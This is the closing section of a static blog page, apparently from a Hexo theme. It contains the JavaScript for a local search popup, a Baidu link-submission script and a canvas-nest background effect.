                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
</body>
</html>
